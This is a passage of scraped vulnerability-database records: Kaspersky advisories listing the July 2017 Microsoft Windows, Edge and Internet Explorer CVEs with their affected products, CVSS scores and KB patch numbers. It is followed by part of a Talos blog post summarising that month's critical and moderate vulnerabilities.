\n[CVE-2017-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8495>)0.0Unknown \n[CVE-2017-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8556>)0.0Unknown \n[CVE-2017-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8557>)0.0Unknown \n[CVE-2017-8563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8563>)0.0Unknown \n[CVE-2017-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8564>)0.0Unknown \n[CVE-2017-8565](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8565>)0.0Unknown \n[CVE-2017-8573](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8573>)0.0Unknown \n[CVE-2017-8577](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8577>)0.0Unknown \n[CVE-2017-8578](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8578>)0.0Unknown \n[CVE-2017-8580](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8580>)0.0Unknown \n[CVE-2017-8581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8581>)0.0Unknown \n[CVE-2017-8582](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8582>)0.0Unknown \n[CVE-2017-8587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8587>)0.0Unknown \n[CVE-2017-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8588>)0.0Unknown \n[CVE-2017-8589](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8589>)0.0Unknown \n[CVE-2017-8590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8590>)0.0Unknown \n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)0.0Unknown \n[CVE-2017-8606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8606>)0.0Unknown \n[CVE-2017-8607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8607>)0.0Unknown \n[CVE-2017-8608](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8608>)0.0Unknown \n[CVE-2017-8618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618>)0.0Unknown\n\n### *KB 
list*:\n[4022746](<http://support.microsoft.com/kb/4022746>) \n[4022748](<http://support.microsoft.com/kb/4022748>) \n[4022914](<http://support.microsoft.com/kb/4022914>) \n[4025337](<http://support.microsoft.com/kb/4025337>) \n[4025341](<http://support.microsoft.com/kb/4025341>) \n[4025397](<http://support.microsoft.com/kb/4025397>) \n[4025398](<http://support.microsoft.com/kb/4025398>) \n[4025409](<http://support.microsoft.com/kb/4025409>) \n[4025497](<http://support.microsoft.com/kb/4025497>) \n[4025674](<http://support.microsoft.com/kb/4025674>) \n[4025872](<http://support.microsoft.com/kb/4025872>) \n[4025877](<http://support.microsoft.com/kb/4025877>) \n[4026059](<http://support.microsoft.com/kb/4026059>) \n[4026061](<http://support.microsoft.com/kb/4026061>) \n[4032955](<http://support.microsoft.com/kb/4032955>) \n[4025240](<http://support.microsoft.com/kb/4025240>) \n[4025252](<http://support.microsoft.com/kb/4025252>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11900", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11900", "title": "\r KLA11900Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:50:19", "bulletinFamily": "info", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0170>) \n[CVE-2017-8463](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8463>) 
\n[CVE-2017-8467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8467>) \n[CVE-2017-8486](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8486>) \n[CVE-2017-8495](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8495>) \n[CVE-2017-8556](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8556>) \n[CVE-2017-8557](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8557>) \n[CVE-2017-8561](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8561>) \n[CVE-2017-8562](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8562>) \n[CVE-2017-8563](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8563>) \n[CVE-2017-8564](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8564>) \n[CVE-2017-8565](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8565>) \n[CVE-2017-8566](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8566>) \n[CVE-2017-8573](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8573>) \n[CVE-2017-8574](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8574>) \n[CVE-2017-8577](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8577>) \n[CVE-2017-8578](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8578>) \n[CVE-2017-8580](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8580>) \n[CVE-2017-8581](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8581>) \n[CVE-2017-8582](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8582>) \n[CVE-2017-8584](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8584>) 
\n[CVE-2017-8587](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8587>) \n[CVE-2017-8588](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8588>) \n[CVE-2017-8589](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8589>) \n[CVE-2017-8590](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8590>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8592>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-0170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0170>)0.0Unknown \n[CVE-2017-8463](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8463>)0.0Unknown \n[CVE-2017-8467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8467>)0.0Unknown \n[CVE-2017-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8486>)0.0Unknown \n[CVE-2017-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8495>)0.0Unknown \n[CVE-2017-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8556>)0.0Unknown \n[CVE-2017-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8557>)0.0Unknown \n[CVE-2017-8561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8561>)0.0Unknown \n[CVE-2017-8562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8562>)0.0Unknown \n[CVE-2017-8563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8563>)0.0Unknown \n[CVE-2017-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8564>)0.0Unknown \n[CVE-2017-8565](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8565>)0.0Unknown \n[CVE-2017-8566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8566>)0.0Unknown \n[CVE-2017-8573](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8573>)0.0Unknown 
\n[CVE-2017-8574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8574>)0.0Unknown \n[CVE-2017-8577](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8577>)0.0Unknown \n[CVE-2017-8578](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8578>)0.0Unknown \n[CVE-2017-8580](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8580>)0.0Unknown \n[CVE-2017-8581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8581>)0.0Unknown \n[CVE-2017-8582](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8582>)0.0Unknown \n[CVE-2017-8584](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8584>)0.0Unknown \n[CVE-2017-8587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8587>)0.0Unknown \n[CVE-2017-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8588>)0.0Unknown \n[CVE-2017-8589](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8589>)0.0Unknown \n[CVE-2017-8590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8590>)0.0Unknown \n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4025344](<http://support.microsoft.com/kb/4025344>) \n[4025338](<http://support.microsoft.com/kb/4025338>) \n[4025331](<http://support.microsoft.com/kb/4025331>) \n[4025333](<http://support.microsoft.com/kb/4025333>) \n[4025336](<http://support.microsoft.com/kb/4025336>) \n[4025343](<http://support.microsoft.com/kb/4025343>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 46, "modified": "2020-07-22T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11067", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11067", "title": "\r KLA11067Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8599", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8594", "CVE-2017-8601", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8609", "CVE-2017-8592", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8602", "CVE-2017-8618"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to bypass security restrictions, execute arbitrary code and spoof user interface.\n\n### *Affected products*:\nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11 \nMicrosoft Edge \nMicrosoft Windows 10 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) 
\n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) 
\n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) \n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)4.3Warning \n[CVE-2017-8594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8594>)7.6Critical 
\n[CVE-2017-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8595>)7.6Critical \n[CVE-2017-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8596>)7.6Critical \n[CVE-2017-8598](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8598>)7.6Critical \n[CVE-2017-8599](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8599>)4.3Warning \n[CVE-2017-8601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8601>)7.6Critical \n[CVE-2017-8602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8602>)4.3Warning \n[CVE-2017-8603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8603>)7.6Critical \n[CVE-2017-8604](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8604>)7.6Critical \n[CVE-2017-8605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8605>)7.6Critical \n[CVE-2017-8606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8606>)7.6Critical \n[CVE-2017-8607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8607>)7.6Critical \n[CVE-2017-8608](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8608>)7.6Critical \n[CVE-2017-8609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8609>)7.6Critical \n[CVE-2017-8610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8610>)7.6Critical \n[CVE-2017-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8611>)4.3Warning \n[CVE-2017-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8617>)7.6Critical \n[CVE-2017-8618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618>)7.6Critical \n[CVE-2017-8619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8619>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038781](<http://support.microsoft.com/kb/4038781>) 
\n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4025344](<http://support.microsoft.com/kb/4025344>) \n[4025338](<http://support.microsoft.com/kb/4025338>) \n[4025331](<http://support.microsoft.com/kb/4025331>) \n[4025336](<http://support.microsoft.com/kb/4025336>) \n[4025341](<http://support.microsoft.com/kb/4025341>) \n[4025252](<http://support.microsoft.com/kb/4025252>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 46, "modified": "2020-06-18T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11070", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11070", "title": "\r KLA11070Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0170", "CVE-2017-0243", "CVE-2017-8463", "CVE-2017-8467", "CVE-2017-8486", "CVE-2017-8495", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8556", "CVE-2017-8557", "CVE-2017-8559", "CVE-2017-8560", "CVE-2017-8561", "CVE-2017-8562", "CVE-2017-8563", "CVE-2017-8564", "CVE-2017-8565", "CVE-2017-8566", "CVE-2017-8569", "CVE-2017-8570", "CVE-2017-8573", "CVE-2017-8574", "CVE-2017-8577", "CVE-2017-8578", "CVE-2017-8580", "CVE-2017-8581", "CVE-2017-8582", "CVE-2017-8584", "CVE-2017-8585", "CVE-2017-8587", "CVE-2017-8588", "CVE-2017-8589", "CVE-2017-8590", "CVE-2017-8592", "CVE-2017-8594", "CVE-2017-8595", "CVE-2017-8596", "CVE-2017-8598", "CVE-2017-8599", "CVE-2017-8601", "CVE-2017-8602", "CVE-2017-8603", "CVE-2017-8604", "CVE-2017-8605", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8608", "CVE-2017-8609", "CVE-2017-8610", "CVE-2017-8611", "CVE-2017-8617", "CVE-2017-8618", "CVE-2017-8619", "CVE-2017-8621"], "description": "Today, Microsoft has released their monthly set of security updates designed to address 
vulnerabilities. This month's release addresses 54 vulnerabilities with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.<br /><br /><a name='more'></a><br /><h3>Vulnerabilities Rated Critical</h3><br /><h4></h4><h4>CVE-2017-8463</h4><div>This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited, this vulnerability could allow arbitrary code to run; users not running as administrators would be less affected. This vulnerability can be triggered via a malicious share folder and malware named with an executable extension.<br /><br /></div><h4>CVE-2017-8584</h4>A remote code execution vulnerability exists when HoloLens improperly handles objects in memory. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would need to send a specially crafted WiFi packet.<br /><br /><h4>CVE-2017-8589</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><br /><h4>CVE-2017-8594</h4>A remote code execution vulnerability exists in Internet Explorer; this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited when a user visits a specially crafted webpage. 
<br /><br /><h4>CVE-2017-8595 / CVE-2017-8596 / CVE-2017-8617 </h4>A remote code execution vulnerability exists in Microsoft Edge; this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited when a user visits a specially crafted webpage. In addition, an attacker could embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the browser rendering engine. <br /><br /><h4>CVE-2017-8598</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8601</h4>This is a remote code execution vulnerability in the Chakra JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website or an ActiveX control marked \"safe for initialization\", resulting in the attacker taking full control of the affected system. <br /><br /><h4>CVE-2017-8603</h4>This is a remote code execution vulnerability in Microsoft Edge related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited when a user visits a specially crafted webpage. <br /><br /><h4>CVE-2017-8604</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. 
The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8605</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8606 / CVE-2017-8607 / CVE-2017-8608 / CVE-2017-8609</h4>This is a remote code execution vulnerability in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. <br /><br /><h4>CVE-2017-8610</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office.<br /><br /><h4>CVE-2017-8618</h4>This is a remote code execution vulnerability in the way the VBScript engine, when rendered in Internet Explorer, handles objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. <br /><br /><h4>CVE-2017-8619</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. 
These can be exploited by a user visiting a specially crafted website. <br /><br /><br /><h4></h4><h3>Vulnerabilities Rated Moderate</h3><div><br /></div><div><br /></div><h4>CVE-2017-0170</h4>An information disclosure vulnerability exists in the Windows Performance Monitor Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data and convince an authenticated user to create a Data Collector Set and import the file. To create a Data Collector Set, the user must be a member of the Performance Log Users or Local Administrators group.<br /><br /><h4>CVE-2017-8611</h4>This is a spoofing vulnerability in Microsoft Edge when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities. <br /><br /><h4>CVE-2017-8621</h4>An open redirect vulnerability exists in Microsoft Exchange that could lead to spoofing. To exploit the vulnerability, an attacker could send a crafted URL, when an authenticated Exchange user clicks the link, the authenticated user's browser session could be redirected to a malicious site that is designed to impersonate a legitimate website. By doing so, the attacker could trick the user and potentially acquire sensitive information, such as the user's credentials.<br /><br /><br /><h3>Vulnerabilities Rated Important</h3><div><br /></div><div><br /></div><h4>CVE-2017-0243</h4>A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file. 
